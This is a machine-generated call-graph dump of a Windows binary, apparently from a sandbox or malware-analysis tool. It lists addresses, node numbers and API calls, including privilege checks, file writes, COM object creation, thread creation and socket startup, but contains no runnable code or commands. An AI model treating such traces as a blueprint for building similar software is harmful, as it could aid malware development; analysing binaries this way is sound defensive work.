17446->17432 17451 e2a834 _fltout2 16 API calls 17447->17451 17498 e321cc 17448->17498 17449 e2a834 _fltout2 16 API calls 17449->17452 17451->17440 17489 e323d4 17452->17489 17516 e2c4b0 17453->17516 17538 e2e4a0 GetModuleHandleW 17454->17538 17458 e305c4 17457->17458 17460 e305fc 17458->17460 17461 e305d8 Sleep 17458->17461 17541 e2c678 17458->17541 17460->17384 17460->17385 17461->17458 17461->17460 17463 e325a0 17462->17463 17464 e2a940 _errno 62 API calls 17463->17464 17467 e2eafa 17463->17467 17465 e325c5 17464->17465 17466 e2a8d8 _invalid_parameter_noinfo 17 API calls 17465->17466 17466->17467 17467->17411 17467->17412 17469 e32547 17468->17469 17470 e3253d 17468->17470 17471 e2a940 _errno 62 API calls 17469->17471 17470->17469 17472 e32564 17470->17472 17476 e32550 17471->17476 17474 e2e923 17472->17474 17475 e2a940 _errno 62 API calls 17472->17475 17473 e2a8d8 _invalid_parameter_noinfo 17 API calls 17473->17474 17474->17430 17474->17446 17475->17476 17476->17473 17527 e2a6e8 17477->17527 17484 e3246c 17480->17484 17481 e32471 17482 e2a940 _errno 62 API calls 17481->17482 17483 e2e9bc 17481->17483 17488 e3249b 17482->17488 17483->17449 17483->17452 17484->17481 17484->17483 17486 e324af 17484->17486 17485 e2a8d8 _invalid_parameter_noinfo 17 API calls 17485->17483 17486->17483 17487 e2a940 _errno 62 API calls 17486->17487 17487->17488 17488->17485 17491 e323ef 17489->17491 17493 e323e5 17489->17493 17490 e2a940 _errno 62 API calls 17492 e323f8 17490->17492 17491->17490 17494 e2a8d8 _invalid_parameter_noinfo 17 API calls 17492->17494 17493->17491 17496 e32426 17493->17496 17495 e2e9e7 17494->17495 17495->17440 17495->17442 17496->17495 17497 e2a940 _errno 62 API calls 17496->17497 17497->17492 17536 e2aaf8 EncodePointer 17498->17536 17517 e2c4b9 17516->17517 17518 e2c4c4 17517->17518 17519 e30da4 RtlCaptureContext RtlLookupFunctionEntry 17517->17519 17518->17422 17520 e30e29 17519->17520 17521 e30de8 RtlVirtualUnwind 17519->17521 17522 e30e4b IsDebuggerPresent 17520->17522 17521->17522 17537 e30950 17522->17537 17524 e30eaa SetUnhandledExceptionFilter UnhandledExceptionFilter 17525 e30ed2 GetCurrentProcess TerminateProcess 17524->17525 17526 e30ec8 _fltout2 17524->17526 17525->17422 17526->17525 17528 e2a722 _fltout2 _snprintf 17527->17528 17529 e2a73e RtlCaptureContext RtlLookupFunctionEntry 17528->17529 17530 e2a777 RtlVirtualUnwind 17529->17530 17531 e2a7ae 17529->17531 17532 e2a7ca IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17530->17532 17531->17532 17533 e2a7fc _fltout2 17532->17533 17534 e2c4b0 _fltout2 8 API calls 17533->17534 17535 e2a81b GetCurrentProcess TerminateProcess 17534->17535 17537->17524 17539 e2e4cf ExitProcess 17538->17539 17540 e2e4ba GetProcAddress 17538->17540 17540->17539 17542 e2c70c 17541->17542 17553 e2c690 17541->17553 17543 e2c738 _callnewh DecodePointer 17542->17543 17544 e2c711 17543->17544 17546 e2a940 _errno 61 API calls 17544->17546 17545 e2c6c8 HeapAlloc 17548 e2c701 17545->17548 17545->17553 17546->17548 17547 e2eaec _FF_MSGBANNER 61 API calls 17556 e2c6a8 17547->17556 17548->17458 17549 e2c6f1 17551 e2a940 _errno 61 API calls 17549->17551 17550 e2c738 _callnewh DecodePointer 17550->17553 17555 e2c6f6 17551->17555 17552 e2e88c _amsg_exit 61 API calls 17552->17556 17553->17545 17553->17549 17553->17550 17553->17555 17553->17556 17554 e2e4dc malloc 3 API calls 17554->17556 17557 e2a940 _errno 61 API calls 17555->17557 17556->17545 17556->17547 17556->17552 17556->17554 17557->17548 17559 e30b64 _lock 56 API calls 17558->17559 17560 e2e69e 17559->17560 17561 e2e6c5 DecodePointer 17560->17561 17564 e2e786 _initterm 17560->17564 17563 e2e6e3 DecodePointer 17561->17563 17561->17564 17562 e2e7bc 17569 e2e7e7 17562->17569 17579 e30a64 LeaveCriticalSection 17562->17579 17568 e2e708 17563->17568 17564->17562 17578 e30a64 LeaveCriticalSection 17564->17578 17568->17564 17573 e2e727 DecodePointer 17568->17573 17575 e2e73d DecodePointer DecodePointer 17568->17575 17576 e2aaf8 EncodePointer 17568->17576 17577 e2aaf8 EncodePointer 17573->17577 17575->17568 17581 e2a8a6 17580->17581 17582 e2a8c7 17580->17582 17581->17284 17583 e2a834 _fltout2 16 API calls 17582->17583 17584 e2a8d6 17583->17584 17585 e2a868 _invalid_parameter_noinfo 16 API calls 17584->17585 17586 e2a8f1 17585->17586 17586->17284 17588 e293fe 17587->17588 17594 e2945f 17587->17594 17598 e2ac68 17588->17598 17591 e29438 17591->17594 17617 e2da14 17591->17617 17594->17288 17596 e293ec _wincmdln 62 API calls 17595->17596 17597 e308d2 17596->17597 17597->17303 17599 e2abe4 _getptd 62 API calls 17598->17599 17600 e2ac73 17599->17600 17601 e29403 17600->17601 17602 e2e838 _amsg_exit 62 API calls 17600->17602 17601->17591 17603 e2e2e4 17601->17603 17602->17601 17604 e2ac68 _getptd 62 API calls 17603->17604 17605 e2e2ef 17604->17605 17606 e2e318 17605->17606 17607 e2e30a 17605->17607 17608 e30b64 _lock 62 API calls 17606->17608 17609 e2ac68 _getptd 62 API calls 17607->17609 17610 e2e322 17608->17610 17612 e2e30f 17609->17612 17628 e2e28c 17610->17628 17615 e2e350 17612->17615 17616 e2e838 _amsg_exit 62 API calls 17612->17616 17615->17591 17616->17615 17618 e2ac68 _getptd 62 API calls 17617->17618 17619 e2da23 17618->17619 17620 e2da3e 17619->17620 17621 e30b64 _lock 62 API calls 17619->17621 17623 e2dac0 17620->17623 17626 e2e838 _amsg_exit 62 API calls 17620->17626 17622 e2da51 17621->17622 17624 e2da87 17622->17624 17627 e2c4d0 free 62 API calls 17622->17627 17623->17594 17875 e30a64 LeaveCriticalSection 17624->17875 17626->17623 17627->17624 17629 e2e2d6 17628->17629 17630 e2e29a _freefls _getptd 17628->17630 17632 e30a64 LeaveCriticalSection 17629->17632 17630->17629 17633 e2e110 17630->17633 17634 e2e1a7 17633->17634 17636 e2e12e 17633->17636 17635 e2e1fa 17634->17635 17637 e2c4d0 free 62 API calls 17634->17637 17650 e2e227 17635->17650 17701 e31848 17635->17701 17636->17634 17639 e2e16d 17636->17639 17647 e2c4d0 free 62 API calls 17636->17647 17640 e2e1cb 17637->17640 17643 e2e18f 17639->17643 17649 e2c4d0 free 62 API calls 17639->17649 17642 e2c4d0 free 62 API calls 17640->17642 17648 e2e1df 17642->17648 17645 e2c4d0 free 62 API calls 17643->17645 17644 e2e272 17651 e2e19b 17645->17651 17646 e2c4d0 free 62 API calls 17646->17650 17652 e2e161 17647->17652 17653 e2c4d0 free 62 API calls 17648->17653 17655 e2e183 17649->17655 17650->17644 17656 e2c4d0 62 API calls free 17650->17656 17657 e2c4d0 free 62 API calls 17651->17657 17661 e31ca4 17652->17661 17654 e2e1ee 17653->17654 17659 e2c4d0 free 62 API calls 17654->17659 17689 e31c38 17655->17689 17656->17650 17657->17634 17659->17635 17662 e31cad 17661->17662 17686 e31da8 17661->17686 17663 e31cc7 17662->17663 17665 e2c4d0 free 62 API calls 17662->17665 17664 e31cd9 17663->17664 17666 e2c4d0 free 62 API calls 17663->17666 17667 e31ceb 17664->17667 17668 e2c4d0 free 62 API calls 17664->17668 17665->17663 17666->17664 17669 e31cfd 17667->17669 17670 e2c4d0 free 62 API calls 17667->17670 17668->17667 17671 e31d0f 17669->17671 17672 e2c4d0 free 62 API calls 17669->17672 17670->17669 17673 e31d21 17671->17673 17674 e2c4d0 free 62 API calls 17671->17674 17672->17671 17675 e31d33 17673->17675 17676 e2c4d0 free 62 API calls 17673->17676 17674->17673 17677 e31d45 17675->17677 17678 e2c4d0 free 62 API calls 17675->17678 17676->17675 17679 e31d57 17677->17679 17680 e2c4d0 free 62 API calls 17677->17680 17678->17677 17681 e31d69 17679->17681 17682 e2c4d0 free 62 API calls 17679->17682 17680->17679 17683 e31d7e 17681->17683 17684 e2c4d0 free 62 API calls 17681->17684 17682->17681 17685 e31d93 17683->17685 17687 e2c4d0 free 62 API calls 17683->17687 17684->17683 17685->17686 17688 e2c4d0 free 62 API calls 17685->17688 17686->17639 17687->17685 17688->17686 17690 e31c3d 17689->17690 17699 e31c9e 17689->17699 17691 e31c56 17690->17691 17692 e2c4d0 free 62 API calls 17690->17692 17693 e31c68 17691->17693 17694 e2c4d0 free 62 API calls 17691->17694 17692->17691 17695 e31c7a 17693->17695 17696 e2c4d0 free 62 API calls 17693->17696 17694->17693 17697 e31c8c 17695->17697 17698 e2c4d0 free 62 API calls 17695->17698 17696->17695 17697->17699 17700 e2c4d0 free 62 API calls 17697->17700 17698->17697 17699->17643 17700->17699 17702 e31851 17701->17702 17703 e2e21b 17701->17703 17704 e2c4d0 free 62 API calls 17702->17704 17703->17646 17705 e31862 17704->17705 17706 e2c4d0 free 62 API calls 17705->17706 17707 e3186b 17706->17707 17708 e2c4d0 free 62 API calls 17707->17708 17709 e31874 17708->17709 17710 e2c4d0 free 62 API calls 17709->17710 17711 e3187d 17710->17711 17712 e2c4d0 free 62 API calls 17711->17712 17713 e31886 17712->17713 17714 e2c4d0 free 62 API calls 17713->17714 17715 e3188f 17714->17715 17716 e2c4d0 free 62 API calls 17715->17716 17717 e31897 17716->17717 17718 e2c4d0 free 62 API calls 17717->17718 17719 e318a0 17718->17719 17720 e2c4d0 free 62 API calls 17719->17720 17721 e318a9 17720->17721 17722 e2c4d0 free 62 API calls 17721->17722 17723 e318b2 17722->17723 17724 e2c4d0 free 62 API calls 17723->17724 17725 e318bb 17724->17725 17726 e2c4d0 free 62 API calls 17725->17726 17727 e318c4 17726->17727 17728 e2c4d0 free 62 API calls 17727->17728 17729 e318cd 17728->17729 17730 e2c4d0 free 62 API calls 17729->17730 17731 e318d6 17730->17731 17732 e2c4d0 free 62 API calls 17731->17732 17733 e318df 17732->17733 17734 e2c4d0 free 62 API calls 17733->17734 17735 e318e8 17734->17735 17736 e2c4d0 free 62 API calls 17735->17736 17737 e318f4 17736->17737 17738 e2c4d0 free 62 API calls 17737->17738 17739 e31900 17738->17739 17740 e2c4d0 free 62 API calls 17739->17740 17741 e3190c 17740->17741 17742 e2c4d0 free 62 API calls 17741->17742 17743 e31918 17742->17743 17744 e2c4d0 free 62 API calls 17743->17744 17745 e31924 17744->17745 17746 e2c4d0 free 62 API calls 17745->17746 17747 e31930 17746->17747 17748 e2c4d0 free 62 API calls 17747->17748 17749 e3193c 17748->17749 17750 e2c4d0 free 62 API calls 17749->17750 17751 e31948 17750->17751 17752 e2c4d0 free 62 API calls 17751->17752 17753 e31954 17752->17753 17754 e2c4d0 free 62 API calls 17753->17754 17755 e31960 17754->17755 17756 e2c4d0 free 62 API calls 17755->17756 17757 e3196c 17756->17757 17758 e2c4d0 free 62 API calls 17757->17758 17759 e31978 17758->17759 17760 e2c4d0 free 62 API calls 17759->17760 17761 e31984 17760->17761 17762 e2c4d0 free 62 API calls 17761->17762 17763 e31990 17762->17763 17764 e2c4d0 free 62 API calls 17763->17764 17765 e3199c 17764->17765 17766 e2c4d0 free 62 API calls 17765->17766 17767 e319a8 17766->17767 17768 e2c4d0 free 62 API calls 17767->17768 17769 e319b4 17768->17769 17770 e2c4d0 free 62 API calls 17769->17770 17771 e319c0 17770->17771 17772 e2c4d0 free 62 API calls 17771->17772 17773 e319cc 17772->17773 17774 e2c4d0 free 62 API calls 17773->17774 17775 e319d8 17774->17775 17776 e2c4d0 free 62 API calls 17775->17776 17777 e319e4 17776->17777 17778 e2c4d0 free 62 API calls 17777->17778 17779 e319f0 17778->17779 17780 e2c4d0 free 62 API calls 17779->17780 17781 e319fc 17780->17781 17782 e2c4d0 free 62 API calls 17781->17782 17783 e31a08 17782->17783 17784 e2c4d0 free 62 API calls 17783->17784 17785 e31a14 17784->17785 17786 e2c4d0 free 62 API calls 17785->17786 17787 e31a20 17786->17787 17788 e2c4d0 free 62 API calls 17787->17788 17789 e31a2c 17788->17789 17790 e2c4d0 free 62 API calls 17789->17790 17791 e31a38 17790->17791 17792 e2c4d0 free 62 API calls 17791->17792 17793 e31a44 17792->17793 17794 e2c4d0 free 62 API calls 17793->17794 17795 e31a50 17794->17795 17796 e2c4d0 free 62 API calls 17795->17796 17797 e31a5c 17796->17797 17798 e2c4d0 free 62 API calls 17797->17798 17799 e31a68 17798->17799 17800 e2c4d0 free 62 API calls 17799->17800 17801 e31a74 17800->17801 17802 e2c4d0 free 62 API calls 17801->17802 17803 e31a80 17802->17803 17804 e2c4d0 free 62 API calls 17803->17804 17805 e31a8c 17804->17805 17806 e2c4d0 free 62 API calls 17805->17806 17807 e31a98 17806->17807 17808 e2c4d0 free 62 API calls 17807->17808 17809 e31aa4 17808->17809 17810 e2c4d0 free 62 API calls 17809->17810 17811 e31ab0 17810->17811 17812 e2c4d0 free 62 API calls 17811->17812 17813 e31abc 17812->17813 17814 e2c4d0 free 62 API calls 17813->17814 17815 e31ac8 17814->17815 17816 e2c4d0 free 62 API calls 17815->17816 17817 e31ad4 17816->17817 17818 e2c4d0 free 62 API calls 17817->17818 17819 e31ae0 17818->17819 17820 e2c4d0 free 62 API calls 17819->17820 17821 e31aec 17820->17821 17822 e2c4d0 free 62 API calls 17821->17822 17823 e31af8 17822->17823 17824 e2c4d0 free 62 API calls 17823->17824 17825 e31b04 17824->17825 17826 e2c4d0 free 62 API calls 17825->17826 17827 e31b10 17826->17827 17828 e2c4d0 free 62 API calls 17827->17828 17829 e31b1c 17828->17829 17830 e2c4d0 free 62 API calls 17829->17830 17831 e31b28 17830->17831 17832 e2c4d0 free 62 API calls 17831->17832 17833 e31b34 17832->17833 17834 e2c4d0 free 62 API calls 17833->17834 17835 e31b40 17834->17835 17836 e2c4d0 free 62 API calls 17835->17836 17837 e31b4c 17836->17837 17838 e2c4d0 free 62 API calls 17837->17838 17839 e31b58 17838->17839 17840 e2c4d0 free 62 API calls 17839->17840 17841 e31b64 17840->17841 17842 e2c4d0 free 62 API calls 17841->17842 17843 e31b70 17842->17843 17844 e2c4d0 free 62 API calls 17843->17844 17845 e31b7c 17844->17845 17846 e2c4d0 free 62 API calls 17845->17846 17847 e31b88 17846->17847 17848 e2c4d0 free 62 API calls 17847->17848 17849 e31b94 17848->17849 17850 e2c4d0 free 62 API calls 17849->17850 17851 e31ba0 17850->17851 17852 e2c4d0 free 62 API calls 17851->17852 17853 e31bac 17852->17853 17854 e2c4d0 free 62 API calls 17853->17854 17855 e31bb8 17854->17855 17856 e2c4d0 free 62 API calls 17855->17856 17857 e31bc4 17856->17857 17858 e2c4d0 free 62 API calls 17857->17858 17859 e31bd0 17858->17859 17860 e2c4d0 free 62 API calls 17859->17860 17861 e31bdc 17860->17861 17862 e2c4d0 free 62 API calls 17861->17862 17863 e31be8 17862->17863 17864 e2c4d0 free 62 API calls 17863->17864 17865 e31bf4 17864->17865 17866 e2c4d0 free 62 API calls 17865->17866 17867 e31c00 17866->17867 17868 e2c4d0 free 62 API calls 17867->17868 17869 e31c0c 17868->17869 17870 e2c4d0 free 62 API calls 17869->17870 17871 e31c18 17870->17871 17872 e2c4d0 free 62 API calls 17871->17872 17873 e31c24 17872->17873 17874 e2c4d0 free 62 API calls 17873->17874 17874->17703 17877 e30345 17876->17877 17878 e29956 17876->17878 17879 e2a940 _errno 62 API calls 17877->17879 17878->17310 17878->17311 17880 e3034a 17879->17880 17881 e2a8d8 _invalid_parameter_noinfo 17 API calls 17880->17881 17881->17878 17883 e300d1 17882->17883 17884 e300de 17882->17884 17885 e2a940 _errno 62 API calls 17883->17885 17886 e300d6 17884->17886 17887 e2a940 _errno 62 API calls 17884->17887 17885->17886 17886->17325 17888 e30115 17887->17888 17889 e2a8d8 _invalid_parameter_noinfo 17 API calls 17888->17889 17889->17886 17891 e3059c __setargv 62 API calls 17890->17891 17892 e3008d 17891->17892 17892->17315 17894 e2ffb7 17893->17894 17895 e2ffcf 17893->17895 17941 e2a960 17894->17941 17896 e30046 17895->17896 17901 e30001 17895->17901 17899 e2a960 __doserrno 62 API calls 17896->17899 17902 e3004b 17899->17902 17900 e2a940 _errno 62 API calls 17916 e2ffc4 17900->17916 17944 e32788 17901->17944 17904 e2a940 _errno 62 API calls 17902->17904 17906 e30053 17904->17906 17909 e2a8d8 _invalid_parameter_noinfo 17 API calls 17906->17909 17907 e30025 17911 e2a940 _errno 62 API calls 17907->17911 17908 e30014 17954 e2f834 17908->17954 17909->17916 17913 e3002a 17911->17913 17912 e30021 18006 e32830 LeaveCriticalSection 17912->18006 17914 e2a960 __doserrno 62 API calls 17913->17914 17914->17912 17916->17322 17918 e2f773 17917->17918 17919 e2f78b 17917->17919 17921 e2a960 __doserrno 62 API calls 17918->17921 17920 e2f805 17919->17920 17925 e2f7bd 17919->17925 17922 e2a960 __doserrno 62 API calls 17920->17922 17923 e2f778 17921->17923 17924 e2f80a 17922->17924 17926 e2a940 _errno 62 API calls 17923->17926 17928 e2a940 _errno 62 API calls 17924->17928 17929 e32788 _flush 64 API calls 17925->17929 17927 e2f780 17926->17927 17927->17322 17930 e2f812 17928->17930 17931 e2f7c4 17929->17931 17932 e2a8d8 _invalid_parameter_noinfo 17 API calls 17930->17932 17933 e2f7e2 17931->17933 17934 e2f7d0 17931->17934 17932->17927 17936 e2a940 _errno 62 API calls 17933->17936 17935 e2f6b8 _flush 64 API calls 17934->17935 17937 e2f7dd 17935->17937 17938 e2f7e7 17936->17938 18038 e32830 LeaveCriticalSection 17937->18038 17939 e2a960 __doserrno 62 API calls 17938->17939 17939->17937 17942 e2abe4 _getptd 62 API calls 17941->17942 17943 e2a969 17942->17943 17943->17900 17945 e327c9 17944->17945 17946 e327fd 17944->17946 17947 e30b64 _lock 62 API calls 17945->17947 17948 e32801 EnterCriticalSection 17946->17948 17949 e30008 17946->17949 17950 e327d1 17947->17950 17948->17949 17949->17907 17949->17908 17951 e327f3 17950->17951 17952 e327d9 InitializeCriticalSectionAndSpinCount 17950->17952 18007 e30a64 LeaveCriticalSection 17951->18007 17952->17951 17956 e2f856 _flush 17954->17956 17955 e2f88a 17957 e2a960 __doserrno 62 API calls 17955->17957 17956->17955 17959 e2f8f0 17956->17959 17993 e2f87e 17956->17993 17960 e2f88f 17957->17960 17958 e2c4b0 _fltout2 8 API calls 17961 e2ff79 17958->17961 17962 e2f905 17959->17962 18008 e2f6b8 17959->18008 17963 e2a940 _errno 62 API calls 17960->17963 17961->17912 17965 e300c8 _isatty 62 API calls 17962->17965 17966 e2f896 17963->17966 17967 e2f90c 17965->17967 17968 e2a8d8 _invalid_parameter_noinfo 17 API calls 17966->17968 17969 e2fbde 17967->17969 17972 e2ac68 _getptd 62 API calls 17967->17972 17968->17993 17970 e2fef3 WriteFile 17969->17970 17971 e2fbf5 17969->17971 17974 e2fbc8 GetLastError 17970->17974 17982 e2fb9e 17970->17982 17973 e2fcce 17971->17973 17978 e2fc03 17971->17978 17975 e2f930 GetConsoleMode 17972->17975 17987 e2fcd8 17973->17987 18000 e2fdb0 17973->18000 17974->17982 17975->17969 17977 e2f961 17975->17977 17976 e2ff29 17979 e2a940 _errno 62 API calls 17976->17979 17976->17993 17977->17969 17981 e2f96e GetConsoleCP 17977->17981 17978->17976 17978->17982 17983 e2fc4f WriteFile 17978->17983 17984 e2ff51 17979->17984 17980 e2fecd 17985 e2fed2 17980->17985 17986 e2ff1d 17980->17986 17981->17982 18004 e2f988 _flush 17981->18004 17982->17976 17982->17980 17982->17993 17983->17974 17983->17978 17989 e2a960 __doserrno 62 API calls 17984->17989 17990 e2a940 _errno 62 API calls 17985->17990 18021 e2a980 17986->18021 17987->17976 17987->17982 17992 e2fd31 WriteFile 17987->17992 17989->17993 17994 e2fed7 17990->17994 17991 e2fe00 WideCharToMultiByte 17995 e2fee9 GetLastError 17991->17995 17991->18000 17992->17974 17992->17987 17993->17958 17996 e2a960 __doserrno 62 API calls 17994->17996 17995->17982 17996->17993 17998 e2fe50 WriteFile 17999 e2fe9a GetLastError 17998->17999 17998->18000 17999->18000 18000->17976 18000->17982 18000->17991 18000->17998 18001 e32858 WriteConsoleW CreateFileW _flush 18001->18004 18002 e2fa2e WideCharToMultiByte 18002->17982 18003 e2fa71 WriteFile 18002->18003 18003->17974 18003->18004 18004->17974 18004->17982 18004->18001 18004->18002 18005 e2faca WriteFile 18004->18005 18018 e30908 18004->18018 18005->17974 18005->18004 18026 e32714 18008->18026 18011 e2f6da 18013 e2a940 _errno 62 API calls 18011->18013 18012 e2f6eb SetFilePointer 18014 e2f709 GetLastError 18012->18014 18016 e2f6df 18012->18016 18013->18016 18015 e2f713 18014->18015 18014->18016 18017 e2a980 _close_nolock 62 API calls 18015->18017 18016->17962 18017->18016 18019 e293ec _wincmdln 62 API calls 18018->18019 18020 e3091c 18019->18020 18020->18004 18022 e2abe4 _getptd 62 API calls 18021->18022 18023 e2a98d 18022->18023 18024 e2abe4 _getptd 62 API calls 18023->18024 18025 e2a9a6 realloc 18024->18025 18025->17993 18027 e32732 18026->18027 18028 e3271d 18026->18028 18031 e2a960 __doserrno 62 API calls 18027->18031 18034 e2f6d4 18027->18034 18029 e2a960 __doserrno 62 API calls 18028->18029 18030 e32722 18029->18030 18032 e2a940 _errno 62 API calls 18030->18032 18033 e3276c 18031->18033 18032->18034 18035 e2a940 _errno 62 API calls 18033->18035 18034->18011 18034->18012 18036 e32774 18035->18036 18037 e2a8d8 _invalid_parameter_noinfo 17 API calls 18036->18037 18037->18034 20481 e04af4 20492 e04827 20481->20492 20482 e04cba WaitForSingleObject 20485 e04cda 20482->20485 20482->20492 20483 e04da0 104 API calls 20483->20492 20484 e04d8d 20485->20484 20486 e04d2a LocalFree 20485->20486 20486->20485 20487 e04c57 LocalFree 20487->20492 20488 e04bab LocalFree 20491 e04710 93 API calls 20488->20491 20489 e04868 LocalFree 20489->20492 20490 e04670 90 API calls 20490->20492 20491->20492 20492->20482 20492->20483 20492->20485 20492->20487 20492->20488 20492->20489 20492->20490 20493 e19cb0 85 API calls 20492->20493 20493->20492 18175 e2c4d0 18176 e2c4d5 RtlFreeHeap 18175->18176 18180 e2c505 realloc 18175->18180 18177 e2c4f0 18176->18177 18176->18180 18178 e2a940 _errno 60 API calls 18177->18178 18179 e2c4f5 GetLastError 18178->18179 18179->18180 18181 e22286 18183 e222a0 18181->18183 18182 e2238c 18184 e22395 18182->18184 18185 e2239a 18182->18185 18183->18182 18248 e1ddc0 AllocateAndInitializeSid 18183->18248 18187 e0f200 106 API calls 18184->18187 18188 e223a3 18185->18188 18189 e223a8 18185->18189 18187->18185 18331 e0ee80 LocalAlloc 18188->18331 18192 e223b6 18189->18192 18366 e1c130 CreateThread 18189->18366 18212 e16790 18192->18212 18194 e0f510 96 API calls 18196 e222e6 18194->18196 18196->18182 18200 e28378 89 API calls 18196->18200 18198 e22432 WSAStartup 18202 e22445 18198->18202 18203 e224b0 18198->18203 18199 e223c9 CreateEventW 18199->18198 18201 e223ed CreateThread 18199->18201 18206 e22348 18200->18206 18207 e22423 18201->18207 18208 e22425 CloseHandle 18201->18208 18204 e2247a CreateThread 18202->18204 18205 e2244e CreateThread 18202->18205 18204->18203 18209 e224b7 WSACleanup 18204->18209 18656 e25d20 OpenEventW 18204->18656 18205->18204 18253 e07ef0 18206->18253 18207->18198 18208->18198 18209->18203 18213 e167a7 18212->18213 18214 e167ac 18213->18214 18368 e0f790 SHGetKnownFolderPath 18213->18368 18214->18198 18214->18199 18219 e16ce1 LocalFree 18219->18214 18220 e16806 LocalAlloc 18221 e16827 lstrcpyW StrStrIW CreateFileW 18220->18221 18222 e16cbb 18220->18222 18225 e16cb0 LocalFree 18221->18225 18226 e1689a GetFileSize 18221->18226 18223 e16cc3 LocalFree 18222->18223 18224 e16cce 18222->18224 18223->18224 18224->18219 18227 e16cd6 LocalFree 18224->18227 18225->18222 18228 e168b6 LocalAlloc 18226->18228 18229 e16c9d 18226->18229 18227->18219 18228->18229 18230 e168d8 ReadFile 18228->18230 18229->18225 18231 e16ca5 CloseHandle 18229->18231 18232 e16c92 LocalFree 18230->18232 18233 e1690f CloseHandle 18230->18233 18231->18225 18232->18229 18234 e16976 18233->18234 18442 e20d00 18234->18442 18236 e169ea 18236->18232 18237 e16a29 LocalAlloc 18236->18237 18242 e16c3d 18236->18242 18238 e16a50 LocalAlloc 18237->18238 18237->18242 18239 e16a77 wmemmove 18238->18239 18240 e16c2f LocalFree 18238->18240 18241 e16a91 lstrcpyW lstrcpyW lstrcpyW 18239->18241 18240->18242 18245 e16b3e 18241->18245 18242->18232 18243 e16c7c VirtualFree 18242->18243 18243->18232 18244 e16c21 LocalFree 18244->18240 18245->18244 18246 e16b98 LocalFree LocalFree LocalFree LocalFree 18245->18246 18246->18214 18249 e1de43 CheckTokenMembership 18248->18249 18250 e1de6c 18248->18250 18251 e1de61 FreeSid 18249->18251 18252 e1de59 18249->18252 18250->18182 18250->18194 18251->18250 18252->18251 18469 e17da0 18253->18469 18255 e07f77 18256 e17da0 5 API calls 18255->18256 18257 e07fd5 CoInitializeEx 18256->18257 18258 e08011 LocalFree 18257->18258 18259 e08018 CoInitializeSecurity 18257->18259 18258->18182 18260 e08066 CoUninitialize 18259->18260 18261 e0806b CoCreateInstance 18259->18261 18260->18258 18261->18260 18263 e080aa 18261->18263 18478 e13320 VariantInit 18263->18478 18265 e080b7 18479 e13320 VariantInit 18265->18479 18267 e08130 18480 e13320 VariantInit 18267->18480 18269 e081a9 18481 e13320 VariantInit 18269->18481 18271 e08222 18482 e133a0 VariantClear 18271->18482 18273 e082dd 18483 e133a0 VariantClear 18273->18483 18275 e082eb 18484 e133a0 VariantClear 18275->18484 18277 e082f9 18485 e133a0 VariantClear 18277->18485 18279 e08307 18280 e08311 CoUninitialize 18279->18280 18486 e13040 18279->18486 18280->18258 18283 e0832a 18491 e130d0 18283->18491 18286 e083a3 18287 e13040 74 API calls 18286->18287 18288 e083b8 18287->18288 18289 e130d0 SysFreeString 18288->18289 18290 e08417 18289->18290 18291 e0845b CoUninitialize 18290->18291 18295 e0847e 18290->18295 18291->18258 18293 e084ad CoUninitialize 18293->18258 18295->18293 18296 e13040 74 API calls 18295->18296 18297 e08574 18296->18297 18298 e130d0 SysFreeString 18297->18298 18299 e085d3 18298->18299 18299->18293 18300 e086e9 CoCreateGuid 18299->18300 18301 e08741 18300->18301 18302 e08728 StringFromGUID2 18300->18302 18303 e13040 74 API calls 18301->18303 18302->18301 18304 e08756 18303->18304 18305 e130d0 SysFreeString 18304->18305 18306 e087b8 18305->18306 18306->18293 18307 e28378 89 API calls 18306->18307 18308 e087e8 18307->18308 18308->18293 18309 e13040 74 API calls 18308->18309 18310 e08878 18309->18310 18311 e130d0 SysFreeString 18310->18311 18312 e088dd 18311->18312 18312->18293 18494 e13340 SysAllocString 18312->18494 18314 e08b56 18496 e13320 VariantInit 18314->18496 18316 e08bcf 18317 e13340 SysAllocString 18316->18317 18318 e08c50 18317->18318 18319 e13040 74 API calls 18318->18319 18320 e08cd1 18319->18320 18321 e130d0 SysFreeString 18320->18321 18322 e08d7d 18321->18322 18497 e133a0 VariantClear 18322->18497 18324 e08d8b 18498 e133a0 VariantClear 18324->18498 18326 e08d99 18499 e133a0 VariantClear 18326->18499 18328 e08da7 18328->18293 18329 e08db6 CoUninitialize 18328->18329 18329->18258 18332 e0eea8 SHGetKnownFolderPath 18331->18332 18335 e0f1e1 18331->18335 18333 e0f1d6 LocalFree 18332->18333 18334 e0eec7 18332->18334 18333->18335 18336 e28378 89 API calls 18334->18336 18335->18189 18337 e0eeee 18336->18337 18338 e0f510 96 API calls 18337->18338 18339 e0eeff 18338->18339 18340 e0ef10 LocalAlloc 18339->18340 18341 e0f1cb CoTaskMemFree 18339->18341 18342 e0f1c0 LocalFree 18340->18342 18343 e0ef31 18340->18343 18341->18333 18342->18341 18594 e29300 18343->18594 18346 e0f1b5 LocalFree 18346->18342 18347 e0ef87 LocalAlloc 18348 e0efa8 18347->18348 18349 e0f1aa CoTaskMemFree 18347->18349 18350 e28378 89 API calls 18348->18350 18349->18346 18351 e0efcf CreateDirectoryW 18350->18351 18352 e0efed GetLastError 18351->18352 18353 e0effe LocalAlloc 18351->18353 18352->18353 18354 e0f19f LocalFree 18352->18354 18353->18354 18355 e0f025 18353->18355 18354->18349 18356 e28378 89 API calls 18355->18356 18357 e0f05b CreateFileW 18356->18357 18358 e0f0b0 WriteFile 18357->18358 18359 e0f191 LocalFree 18357->18359 18360 e0f0f5 CloseHandle 18358->18360 18361 e0f178 18358->18361 18359->18354 18605 e1e520 CoInitialize 18360->18605 18361->18359 18363 e0f183 CloseHandle 18361->18363 18363->18359 18365 e0f12c 6 API calls 18365->18335 18367 e1c16d 18366->18367 18643 e1c1f0 GetModuleHandleW 18366->18643 18367->18192 18369 e0f7b9 LocalAlloc 18368->18369 18372 e0f835 18368->18372 18370 e0f7d6 wnsprintfW 18369->18370 18371 e0f82a CoTaskMemFree 18369->18371 18370->18371 18373 e0f806 lstrlenW CoTaskMemFree 18370->18373 18371->18372 18372->18214 18374 e15a80 18372->18374 18373->18372 18375 e0f790 6 API calls 18374->18375 18376 e15aa3 18375->18376 18377 e164a1 18376->18377 18378 e15ab4 LocalAlloc 18376->18378 18377->18219 18377->18220 18379 e15ad5 LocalAlloc 18378->18379 18380 e16496 LocalFree 18378->18380 18381 e15af6 18379->18381 18382 e1648b LocalFree 18379->18382 18380->18377 18383 e15b48 18381->18383 18384 e15afd wnsprintfW wnsprintfW 18381->18384 18382->18380 18386 e15b9a 18383->18386 18387 e15b4f wnsprintfW wnsprintfW 18383->18387 18385 e1645f LocalFree 